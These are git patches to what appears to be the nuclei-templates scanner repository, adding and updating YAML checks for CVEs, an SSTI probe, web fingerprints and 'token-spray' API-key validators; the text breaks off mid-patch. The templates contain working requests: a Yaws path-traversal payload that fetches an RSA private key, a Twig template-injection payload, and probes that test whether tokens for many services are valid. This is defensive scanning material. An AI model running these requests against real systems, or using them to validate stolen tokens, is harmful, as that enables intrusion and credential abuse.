words: + - "database" + - "host" + - "password" + - "port" + - "username" + part: body + condition: and + + - type: status + status: + - 200 From edd504d533b34d732eb56270f9c2bd0ff5e1e5bf Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 9 Nov 2021 07:38:40 +0900 Subject: [PATCH 3517/4083] Create CVE-2017-10974.yaml --- CVE-2017-10974.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 CVE-2017-10974.yaml diff --git a/CVE-2017-10974.yaml b/CVE-2017-10974.yaml new file mode 100644 index 0000000000..3d99cc4194 --- /dev/null +++ b/CVE-2017-10974.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-10974 + +info: + name: Yaws 1.91 - Remote File Disclosure + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/42303 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-10974 + cwe-id: CWE-22 + tags: cve,cve2017,yaws,rfd,lfi + + +requests: + - method: GET + path: + - "{{BaseURL}}/%5C../ssl/yaws-key.pem" + + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN RSA PRIVATE KEY" + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(tolower(body), " Date: Tue, 9 Nov 2021 22:13:59 +0530 Subject: [PATCH 3518/4083] Update and rename CVE-2017-10974.yaml to cves/2017/CVE-2017-10974.yaml --- CVE-2017-10974.yaml => cves/2017/CVE-2017-10974.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) rename CVE-2017-10974.yaml => cves/2017/CVE-2017-10974.yaml (63%) diff --git a/CVE-2017-10974.yaml b/cves/2017/CVE-2017-10974.yaml similarity index 63% rename from CVE-2017-10974.yaml rename to cves/2017/CVE-2017-10974.yaml index 3d99cc4194..1e4cbc67c3 100644 --- a/CVE-2017-10974.yaml +++ b/cves/2017/CVE-2017-10974.yaml @@ -4,13 +4,16 @@ info: name: Yaws 1.91 - Remote File Disclosure author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/42303 + description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080 + reference: + - https://www.exploit-db.com/exploits/42303 + - https://nvd.nist.gov/vuln/detail/CVE-2017-10974 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-10974 cwe-id: CWE-22 - tags: cve,cve2017,yaws,rfd,lfi + tags: cve,cve2017,yaws,lfi requests: @@ -31,3 +34,5 @@ requests: - type: dsl dsl: - '!contains(tolower(body), " Date: Tue, 9 Nov 2021 22:16:37 +0530 Subject: [PATCH 3519/4083] Added skip-variables-check for SSTI template --- vulnerabilities/other/twig-php-ssti.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/twig-php-ssti.yaml b/vulnerabilities/other/twig-php-ssti.yaml index 74355ae13b..7fe034f73d 100644 --- a/vulnerabilities/other/twig-php-ssti.yaml +++ b/vulnerabilities/other/twig-php-ssti.yaml @@ -5,20 +5,22 @@ info: author: madrobot severity: high description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability. - tags: php,ssti + tags: php,ssti,twig requests: - method: GET path: - "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D" + skip-variables-check: true matchers-condition: and matchers: - type: word + part: body words: - "1788906" - part: body + - type: status status: - 404 - negative: true + negative: true \ No newline at end of file From d165a9fe33379cea2be95d48d72a304904c9ab84 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 9 Nov 2021 22:20:29 +0530 Subject: [PATCH 3520/4083] Update and rename CVE-2017-15363.yaml to cves/2017/CVE-2017-15363.yaml --- CVE-2017-15363.yaml => cves/2017/CVE-2017-15363.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename CVE-2017-15363.yaml => cves/2017/CVE-2017-15363.yaml (90%) diff --git a/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml similarity index 90% rename from CVE-2017-15363.yaml rename to cves/2017/CVE-2017-15363.yaml index f0e1f375b8..aafe16b2b5 100644 --- a/CVE-2017-15363.yaml +++ b/cves/2017/CVE-2017-15363.yaml @@ -22,13 +22,13 @@ requests: matchers-condition: and matchers: - type: word - words: - - "database" - - "host" - - "password" - - "port" - - "username" part: body + words: + - " Date: Tue, 9 Nov 2021 16:55:13 +0000 Subject: [PATCH 3521/4083] Auto Generated CVE annotations [Tue Nov 9 16:55:13 UTC 2021] :robot: --- cves/2019/CVE-2019-1821.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2019/CVE-2019-1821.yaml b/cves/2019/CVE-2019-1821.yaml index 6e8f97c3c0..dc80c371b1 100644 --- a/cves/2019/CVE-2019-1821.yaml +++ b/cves/2019/CVE-2019-1821.yaml @@ -12,6 +12,11 @@ info: metadata: shodan-query: 'http.title:"prime infrastructure"' tags: rce,fileupload,unauth,cve,cve2019 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-1821 + cwe-id: CWE-20 requests: - raw: From 462c4f7b12fbc0db137636d07c7ca75ce93c2ed6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 10 Nov 2021 15:05:20 +0530 Subject: [PATCH 3522/4083] more changes --- token-spray/{heroku.yaml => api-heroku.yaml} | 13 ++++++------- token-spray/{hubspot.yaml => api-hubspot.yaml} | 17 +++++++++++++---- .../{instagram.yaml => api-instagram.yaml} | 12 ++++++++---- .../{intercom.yaml => api-intercom.yaml} | 0 token-spray/{ipstack.yaml => api-ipstack.yaml} | 8 +++++--- .../{iterable.yaml => api-iterable.yaml} | 10 +++++----- .../{jumpcloud.yaml => api-jumpcloud.yaml} | 7 ++++--- .../{linkedin.yaml => api-linkedin.yaml} | 6 ++++-- .../{lokalise.yaml => api-lokalise.yaml} | 16 ++++++++++------ token-spray/{loqate.yaml => api-loqate.yaml} | 4 ++-- .../{mailchimp.yaml => api-mailchimp.yaml} | 2 +- token-spray/{mailgun.yaml => api-mailgun.yaml} | 12 ++++++++---- token-spray/{mapbox.yaml => api-mapbox.yaml} | 11 +++++++---- .../{nerdgraph.yaml => api-nerdgraph.yaml} | 2 +- token-spray/{netlify.yaml => api-netlify.yaml} | 12 ++++++++---- token-spray/{npm.yaml => api-npm.yaml} | 4 ++-- .../{onelogin.yaml => api-onelogin.yaml} | 16 ++++++++++------ .../{openweather.yaml => api-openweather.yaml} | 12 ++++++++---- .../{optimizely.yaml => api-optimizely.yaml} | 6 ++++-- .../{pagerduty.yaml => api-pagerduty.yaml} | 12 +++++++----- token-spray/{paypal.yaml => api-paypal.yaml} | 0 token-spray/{pendo.yaml => api-pendo.yaml} | 13 +++++++------ ...otaltracker.yaml => api-pivotaltracker.yaml} | 1 + .../{postmark.yaml => api-postmark.yaml} | 14 +++++++++----- .../{sendgrid.yaml => api-sendgrid.yaml} | 2 +- token-spray/{slack.yaml => api-slack.yaml} | 6 ++++-- .../{travisci.yaml => api-travisci.yaml} | 2 +- 27 files changed, 136 insertions(+), 84 deletions(-) rename token-spray/{heroku.yaml => api-heroku.yaml} (76%) rename token-spray/{hubspot.yaml => api-hubspot.yaml} (54%) rename token-spray/{instagram.yaml => api-instagram.yaml} (55%) rename token-spray/{intercom.yaml => api-intercom.yaml} (100%) rename token-spray/{ipstack.yaml => api-ipstack.yaml} (79%) rename token-spray/{iterable.yaml => api-iterable.yaml} (55%) rename token-spray/{jumpcloud.yaml => api-jumpcloud.yaml} (85%) rename token-spray/{linkedin.yaml => api-linkedin.yaml} (82%) rename token-spray/{lokalise.yaml => api-lokalise.yaml} (55%) rename token-spray/{loqate.yaml => api-loqate.yaml} (73%) rename token-spray/{mailchimp.yaml => api-mailchimp.yaml} (100%) rename token-spray/{mailgun.yaml => api-mailgun.yaml} (70%) rename token-spray/{mapbox.yaml => api-mapbox.yaml} (71%) rename token-spray/{nerdgraph.yaml => api-nerdgraph.yaml} (100%) rename token-spray/{netlify.yaml => api-netlify.yaml} (70%) rename token-spray/{npm.yaml => api-npm.yaml} (90%) rename token-spray/{onelogin.yaml => api-onelogin.yaml} (58%) rename token-spray/{openweather.yaml => api-openweather.yaml} (69%) rename token-spray/{optimizely.yaml => api-optimizely.yaml} (85%) rename token-spray/{pagerduty.yaml => api-pagerduty.yaml} (76%) rename token-spray/{paypal.yaml => api-paypal.yaml} (100%) rename token-spray/{pendo.yaml => api-pendo.yaml} (74%) rename token-spray/{pivotaltracker.yaml => api-pivotaltracker.yaml} (94%) rename token-spray/{postmark.yaml => api-postmark.yaml} (63%) rename token-spray/{sendgrid.yaml => api-sendgrid.yaml} (100%) rename token-spray/{slack.yaml => api-slack.yaml} (80%) rename token-spray/{travisci.yaml => api-travisci.yaml} (100%) diff --git a/token-spray/heroku.yaml b/token-spray/api-heroku.yaml similarity index 76% rename from token-spray/heroku.yaml rename to token-spray/api-heroku.yaml index ef81ec91e8..ef9b58c7ae 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/api-heroku.yaml @@ -17,10 +17,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - condition: or - status: - - 200 - - 201 - - 202 - - 206 + - type: word + part: body + words: + - '"created_at":' + - '"git_url":' + condition: and \ No newline at end of file diff --git a/token-spray/hubspot.yaml b/token-spray/api-hubspot.yaml similarity index 54% rename from token-spray/hubspot.yaml rename to token-spray/api-hubspot.yaml index da95a4b12a..4526b146f6 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/api-hubspot.yaml @@ -3,8 +3,8 @@ id: api-hubspot info: name: HubSpot API Test author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners severity: info + reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners tags: token-spray,hubspot self-contained: true @@ -12,11 +12,20 @@ requests: - method: GET path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + - "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}" + matchers-condition: or matchers: - type: word part: body words: - - 'error' - negative: true + - '"portalId":' + - '"ownerId":' + condition: and + + - type: word + part: body + words: + - '"metaData":' + - '"portalId":' + condition: and \ No newline at end of file diff --git a/token-spray/instagram.yaml b/token-spray/api-instagram.yaml similarity index 55% rename from token-spray/instagram.yaml rename to token-spray/api-instagram.yaml index dd851bee3e..fc463c8bac 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/api-instagram.yaml @@ -11,9 +11,13 @@ self-contained: true requests: - method: GET path: - - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"access_token":' + - '"name":' + condition: and diff --git a/token-spray/intercom.yaml b/token-spray/api-intercom.yaml similarity index 100% rename from token-spray/intercom.yaml rename to token-spray/api-intercom.yaml diff --git a/token-spray/ipstack.yaml b/token-spray/api-ipstack.yaml similarity index 79% rename from token-spray/ipstack.yaml rename to token-spray/api-ipstack.yaml index ac527d2a1e..8f560a1b34 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/api-ipstack.yaml @@ -3,8 +3,8 @@ id: api-ipstack info: name: IPStack API Test author: zzeitlin - reference: https://ipstack.com/documentation severity: info + reference: https://ipstack.com/documentation tags: token-spray,ipstack self-contained: true @@ -16,6 +16,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'invalid_access_key' + - '"ip":' + - '"hostname":' + - '"type":' + condition: and diff --git a/token-spray/iterable.yaml b/token-spray/api-iterable.yaml similarity index 55% rename from token-spray/iterable.yaml rename to token-spray/api-iterable.yaml index 69da55de5d..b559444b8f 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/api-iterable.yaml @@ -3,22 +3,22 @@ id: api-iterable info: name: Iterable API Test author: zzeitlin - reference: https://api.iterable.com/api/docs severity: info + reference: https://api.iterable.com/api/docs tags: token-spray,iterable self-contained: true requests: - method: GET path: - - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" + - "https://api.iterable.com/api/catalogs" headers: Api_Key: "{{token}}" matchers: - type: word part: body - negative: true words: - - 'BadApiKey' - - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve + - '"name":' + - '"catalogNames":' + condition: and diff --git a/token-spray/jumpcloud.yaml b/token-spray/api-jumpcloud.yaml similarity index 85% rename from token-spray/jumpcloud.yaml rename to token-spray/api-jumpcloud.yaml index dbf3c9ab35..6b9dc68d93 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/api-jumpcloud.yaml @@ -3,8 +3,8 @@ id: api-jumpcloud info: name: JumpCloud API Test author: zzeitlin - reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key severity: info + reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key tags: token-spray,jumpcloud self-contained: true @@ -18,6 +18,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unauthorized' + - '"_id":' + - '"agentServer":' + condition: and diff --git a/token-spray/linkedin.yaml b/token-spray/api-linkedin.yaml similarity index 82% rename from token-spray/linkedin.yaml rename to token-spray/api-linkedin.yaml index 611f28d422..3631ace894 100644 --- a/token-spray/linkedin.yaml +++ b/token-spray/api-linkedin.yaml @@ -21,6 +21,8 @@ requests: - type: word part: body - negative: true words: - - "serviceErrorCode" \ No newline at end of file + - '"id":' + - '"firstName":' + - '"localized":' + condition: and \ No newline at end of file diff --git a/token-spray/lokalise.yaml b/token-spray/api-lokalise.yaml similarity index 55% rename from token-spray/lokalise.yaml rename to token-spray/api-lokalise.yaml index 5003f25b31..c513a20064 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/api-lokalise.yaml @@ -3,19 +3,23 @@ id: api-lokalise info: name: Lokalise API Test author: zzeitlin - reference: https://app.lokalise.com/api2docs/curl/#resource-projects severity: info + reference: https://app.lokalise.com/api2docs/curl/#resource-projects tags: token-spray,lokalise self-contained: true requests: - method: GET path: - - "https://api.lokalise.com/api2/projects/" + - "https://api.lokalise.com/api2/teams" headers: - X-Api-Token: "{{token}}" + x-api-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"teams":' + - '"team_id":' + - '"name":' + condition: and \ No newline at end of file diff --git a/token-spray/loqate.yaml b/token-spray/api-loqate.yaml similarity index 73% rename from token-spray/loqate.yaml rename to token-spray/api-loqate.yaml index dcbf5b156d..10fa82f23a 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/api-loqate.yaml @@ -3,15 +3,15 @@ id: api-loqate info: name: Loqate API Test author: zzeitlin - reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ severity: info + reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ tags: token-spray,loqate self-contained: true requests: - method: GET path: - - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + - "https://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" matchers: - type: word diff --git a/token-spray/mailchimp.yaml b/token-spray/api-mailchimp.yaml similarity index 100% rename from token-spray/mailchimp.yaml rename to token-spray/api-mailchimp.yaml index d25870e279..5232ddda97 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/api-mailchimp.yaml @@ -3,8 +3,8 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration severity: info + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration tags: token-spray,mailchimp self-contained: true diff --git a/token-spray/mailgun.yaml b/token-spray/api-mailgun.yaml similarity index 70% rename from token-spray/mailgun.yaml rename to token-spray/api-mailgun.yaml index c4997aaaa4..dfa06bdfaa 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/api-mailgun.yaml @@ -3,8 +3,8 @@ id: api-mailgun info: name: Mailgun API Test author: zzeitlin - reference: https://documentation.mailgun.com/en/latest/api-intro.html severity: info + reference: https://documentation.mailgun.com/en/latest/api-intro.html tags: token-spray,mailgun self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Basic {{base64('api:' + token)}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"total_count":' + - '"items":' + - '"created_at":' + condition: and diff --git a/token-spray/mapbox.yaml b/token-spray/api-mapbox.yaml similarity index 71% rename from token-spray/mapbox.yaml rename to token-spray/api-mapbox.yaml index 1e246f783b..4ed5e0648f 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/api-mapbox.yaml @@ -14,7 +14,10 @@ requests: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - 'type' + - 'query' + - 'features' + condition: and diff --git a/token-spray/nerdgraph.yaml b/token-spray/api-nerdgraph.yaml similarity index 100% rename from token-spray/nerdgraph.yaml rename to token-spray/api-nerdgraph.yaml index ca570964e4..d367685e7f 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/api-nerdgraph.yaml @@ -3,8 +3,8 @@ id: api-nerdgraph info: name: New Relic NerdGraph API Test author: zzeitlin - reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ severity: info + reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ tags: token-spray,newrelic,nerdgraph self-contained: true diff --git a/token-spray/netlify.yaml b/token-spray/api-netlify.yaml similarity index 70% rename from token-spray/netlify.yaml rename to token-spray/api-netlify.yaml index b282f7acd9..e57127c9f5 100644 --- a/token-spray/netlify.yaml +++ b/token-spray/api-netlify.yaml @@ -3,8 +3,8 @@ id: api-netlify info: name: Netlify API Test author: dwisiswant0 - reference: https://docs.netlify.com/api/get-started/ severity: info + reference: https://docs.netlify.com/api/get-started/ tags: token-spray,netlify self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"id":' + - '"premium":' + - '"claimed":' + condition: and diff --git a/token-spray/npm.yaml b/token-spray/api-npm.yaml similarity index 90% rename from token-spray/npm.yaml rename to token-spray/api-npm.yaml index fb0ef0b6b7..522c793520 100644 --- a/token-spray/npm.yaml +++ b/token-spray/api-npm.yaml @@ -3,9 +3,9 @@ id: api-npm info: name: NPM API Test author: zzeitlin - reference: https://docs.npmjs.com/creating-and-viewing-access-tokens severity: info - tags: token-spray,node,npm,package,manager + reference: https://docs.npmjs.com/creating-and-viewing-access-tokens + tags: token-spray,node,npm self-contained: true requests: diff --git a/token-spray/onelogin.yaml b/token-spray/api-onelogin.yaml similarity index 58% rename from token-spray/onelogin.yaml rename to token-spray/api-onelogin.yaml index f57001c5f9..d8369ad80b 100644 --- a/token-spray/onelogin.yaml +++ b/token-spray/api-onelogin.yaml @@ -3,21 +3,25 @@ id: api-onelogin info: name: OneLogin API Test author: dwisiswant0 - reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview severity: info + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview tags: token-spray,onelogin self-contained: true requests: - method: GET path: - - "https://api.us.onelogin.com/api/2/users?fields=id" - - "https://api.eu.onelogin.com/api/2/users?fields=id" + - "https://api.us.onelogin.com/api/2/apps" + - "https://api.eu.onelogin.com/api/2/apps" headers: Authorization: Bearer {{token}} stop-at-first-match: true matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"id":' + - '"connector_id":' + - '"auth_method":' + condition: and diff --git a/token-spray/openweather.yaml b/token-spray/api-openweather.yaml similarity index 69% rename from token-spray/openweather.yaml rename to token-spray/api-openweather.yaml index 916936aa97..13a26aecc3 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/api-openweather.yaml @@ -3,8 +3,8 @@ id: api-openweather info: name: OpenWeather API Test author: zzeitlin - reference: https://openweathermap.org/current severity: info + reference: https://openweathermap.org/current tags: token-spray,weather,openweather self-contained: true @@ -14,6 +14,10 @@ requests: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"coord":' + - '"weather":' + - '"base":' + condition: and diff --git a/token-spray/optimizely.yaml b/token-spray/api-optimizely.yaml similarity index 85% rename from token-spray/optimizely.yaml rename to token-spray/api-optimizely.yaml index 8743b893fc..48105d1bec 100644 --- a/token-spray/optimizely.yaml +++ b/token-spray/api-optimizely.yaml @@ -3,8 +3,8 @@ id: api-optimizely info: name: Optimizely API Test author: dwisiswant0 - reference: https://library.optimizely.com/docs/api/app/v2/index.html severity: info + reference: https://library.optimizely.com/docs/api/app/v2/index.html tags: token-spray,optimizely self-contained: true @@ -24,4 +24,6 @@ requests: - type: word part: body words: - - "account_id" + - '"account_id":' + - '"confidence_threshold":' + condition: and \ No newline at end of file diff --git a/token-spray/pagerduty.yaml b/token-spray/api-pagerduty.yaml similarity index 76% rename from token-spray/pagerduty.yaml rename to token-spray/api-pagerduty.yaml index bad59948ed..902fae8ec0 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/api-pagerduty.yaml @@ -3,8 +3,8 @@ id: api-pagerduty info: name: Pagerduty API Test author: zzeitlin - reference: https://developer.pagerduty.com/api-reference severity: info + reference: https://developer.pagerduty.com/api-reference tags: token-spray,pagerduty self-contained: true @@ -17,7 +17,9 @@ requests: Authorization: Token token={{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"schedules":' + - '"id":' + condition: and diff --git a/token-spray/paypal.yaml b/token-spray/api-paypal.yaml similarity index 100% rename from token-spray/paypal.yaml rename to token-spray/api-paypal.yaml diff --git a/token-spray/pendo.yaml b/token-spray/api-pendo.yaml similarity index 74% rename from token-spray/pendo.yaml rename to token-spray/api-pendo.yaml index 66cd885dc6..023a6f347c 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/api-pendo.yaml @@ -3,8 +3,8 @@ id: api-pendo info: name: Pendo API Test author: zzeitlin - reference: https://help.pendo.io/resources/support-library/api/index.html severity: info + reference: https://help.pendo.io/resources/support-library/api/index.html tags: token-spray,pendo self-contained: true @@ -12,13 +12,14 @@ requests: - method: GET path: - "https://app.pendo.io/api/v1/feature" - - "https://app.pendo.io/api/v1/metadata/schema/account" headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" matchers: - - type: status - status: - - 403 - negative: true \ No newline at end of file + - type: word + part: body + words: + - '"createdByUser":' + - '"id":' + condition: and \ No newline at end of file diff --git a/token-spray/pivotaltracker.yaml b/token-spray/api-pivotaltracker.yaml similarity index 94% rename from token-spray/pivotaltracker.yaml rename to token-spray/api-pivotaltracker.yaml index d7a74ded66..1f7e7007e0 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/api-pivotaltracker.yaml @@ -21,3 +21,4 @@ requests: negative: true words: - 'invalid_authentication' + - 'unauthenticated' diff --git a/token-spray/postmark.yaml b/token-spray/api-postmark.yaml similarity index 63% rename from token-spray/postmark.yaml rename to token-spray/api-postmark.yaml index 85367b5c61..b9bec134db 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/api-postmark.yaml @@ -3,20 +3,24 @@ id: api-postmark info: name: PostMark API Test author: zzeitlin - reference: https://postmarkapp.com/developer/api/overview severity: info + reference: https://postmarkapp.com/developer/api/overview tags: token-spray,postmark self-contained: true requests: - method: GET path: - - "https://api.postmarkapp.com/stats/outbound" + - "https://api.postmarkapp.com/server" headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"ID":' + - '"Name":' + - '"ApiTokens":' + condition: and diff --git a/token-spray/sendgrid.yaml b/token-spray/api-sendgrid.yaml similarity index 100% rename from token-spray/sendgrid.yaml rename to token-spray/api-sendgrid.yaml index d9330371f1..3c24d1dfaf 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/api-sendgrid.yaml @@ -3,8 +3,8 @@ id: api-sendgrid info: name: Sendgrid API Test author: zzeitlin - reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp severity: info + reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp tags: token-spray,sendgrid self-contained: true diff --git a/token-spray/slack.yaml b/token-spray/api-slack.yaml similarity index 80% rename from token-spray/slack.yaml rename to token-spray/api-slack.yaml index 8203aa56b5..d9a36d5801 100644 --- a/token-spray/slack.yaml +++ b/token-spray/api-slack.yaml @@ -19,5 +19,7 @@ requests: - type: word part: body words: - - 'error' - negative: true + - '"url":' + - '"team_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/token-spray/travisci.yaml b/token-spray/api-travisci.yaml similarity index 100% rename from token-spray/travisci.yaml rename to token-spray/api-travisci.yaml index 3b43f9e529..63489fc886 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/api-travisci.yaml @@ -3,8 +3,8 @@ id: api-travisci info: name: Travis CI API Test author: zzeitlin - reference: https://developer.travis-ci.com/ severity: info + reference: https://developer.travis-ci.com/ tags: token-spray,travis self-contained: true From 2cfad99d03c03bdc9ecb836e0b46d8d8d1787976 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Nov 2021 16:04:38 +0000 Subject: [PATCH 3523/4083] Auto Generated CVE annotations [Wed Nov 10 16:04:38 UTC 2021] :robot: --- cves/2021/CVE-2021-31602.yaml | 7 ++++++- cves/2021/CVE-2021-42237.yaml | 5 +++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml index 3b8ecf630d..14a0ed5e18 100644 --- a/cves/2021/CVE-2021-31602.yaml +++ b/cves/2021/CVE-2021-31602.yaml @@ -3,7 +3,7 @@ id: CVE-2021-31602 info: name: Pentaho <= 9.1 Authentication Bypass of Spring APIs author: pussycat0x - severity: medium + severity: high reference: - https://seclists.org/fulldisclosure/2021/Nov/13 - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software @@ -13,6 +13,11 @@ info: tags: cve,cve2021,pentaho,auth-bypass description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-31602 + cwe-id: CWE-863 requests: - method: GET path: diff --git a/cves/2021/CVE-2021-42237.yaml b/cves/2021/CVE-2021-42237.yaml index 1e8ce1c74c..737556c0de 100644 --- a/cves/2021/CVE-2021-42237.yaml +++ b/cves/2021/CVE-2021-42237.yaml @@ -19,6 +19,11 @@ info: metadata: shodan-query: http.title:"SiteCore" tags: rce,sitecore,deserialization,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-42237 + cwe-id: CWE-502 requests: - raw: From d6c8033a74d2265013d27884cf459a651002add5 Mon Sep 17 00:00:00 2001 From: idealphase Date: Wed, 10 Nov 2021 23:06:46 +0700 Subject: [PATCH 3524/4083] Update fingerprinthub-web-fingerprints.yaml Added GlassFish Server Open Source Edition fingerprint --- technologies/fingerprinthub-web-fingerprints.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index e3d7f77b2b..2438bf47a7 100644 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -4432,6 +4432,12 @@ requests: name: gitweb words: - /gitweb.js + + - type: word + part: header + name: glassfish + words: + - "Server: GlassFish Server Open Source Edition" - type: word name: globalsign-cert @@ -15122,4 +15128,4 @@ requests: - type: word name: zzzcms words: - - Powered by ZZZcms \ No newline at end of file + - Powered by ZZZcms From 8aa7e6166586038a2c53e95065842b186bf0a89a Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 10 Nov 2021 21:48:32 +0530 Subject: [PATCH 3525/4083] Update fingerprinthub-web-fingerprints.yaml --- technologies/fingerprinthub-web-fingerprints.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index 2438bf47a7..5c947d8fa6 100644 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -4432,7 +4432,7 @@ requests: name: gitweb words: - /gitweb.js - + - type: word part: header name: glassfish From 7e10c6eb426e421f2141df5c2d6461817d72a091 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 17:46:34 +0000 Subject: [PATCH 3526/4083] Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably --- cves/2018/CVE-2018-15961 | 